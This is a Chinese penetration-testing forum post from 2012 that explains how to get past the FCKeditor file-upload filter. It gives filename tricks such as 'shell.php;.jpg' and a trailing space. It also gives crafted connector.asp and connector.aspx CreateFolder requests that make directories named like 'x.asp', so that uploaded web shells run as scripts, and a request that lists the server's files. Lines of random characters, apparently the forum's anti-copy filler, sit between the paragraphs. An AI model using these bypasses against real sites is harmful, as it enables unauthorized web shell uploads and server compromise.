中国网络渗透测试联盟
标题:
FCK 0day FCKeditor 建立文件夹,上传文件时"."变"_"的突破
[打印本页]
作者:
admin
时间:
2012-12-31 09:27
标题:
FCK 0day FCKeditor 建立文件夹,上传文件时"."变"_"的突破
很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
- w) b) G: v0 j5 v* @, N
* }! x6 T+ k! _
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。
4 I! a; y4 A2 ]3 I* u
4 A# `: p* B! N9 N
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
4 g( k8 l3 v0 u2 A; i6 c6 y- \4 l
! Q3 F' ^, A; c, |
突破建立文件夹:
9 A1 B# s+ a: i
2 ]2 o% M$ c( N
editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
' ~8 A- s, _1 E/ v7 X
- N8 h5 h3 d' A
参数:
, E9 f. `9 R/ b% \% |
. B- [1 o3 g6 r$ B% P
当前目录名:CurrentFolder=/qing.asp
$ F6 ?2 X! W" i
* S6 N; Z3 s5 }. l+ r
新的目录名:NewFolderName=x.asp
. Q2 _" m6 X+ h& P0 O: o. M
' q( j7 U6 \- `
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……
( l( W3 M- p; `
/ n8 X7 M; l" q6 N3 S2 k
那么 x.asp 就已经建立生成了,此方法百试百灵!
, J) y( l* j+ g2 d
8 R& ]1 P' j% C1 k) k
新建文件夹参数 x.asp,基本都能搞定。
2 K" N0 G, E! ?7 X9 ~3 G
. y$ A. l, C5 P2 H4 d
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
: }. U, h6 H" u( V4 K6 t' j
) g3 Z# T; K9 }4 T7 d9 l9 B# }" u
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
) k1 K' ~) v" z1 k, w$ x0 G. i
( a9 C7 s& j# i, }' a3 ]2 x) Y
获取文件列表
, m- n& i9 ?9 P8 ^5 f* Z' \
aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
; W% \0 G5 |; m. i% g
2 x0 ?, p) ~2 C5 G- Q5 c( ?
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2